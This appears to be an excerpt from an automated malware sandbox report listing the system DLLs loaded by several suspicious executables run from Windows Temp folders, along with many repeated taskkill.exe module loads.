Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Section loaded: dnsapi.dll
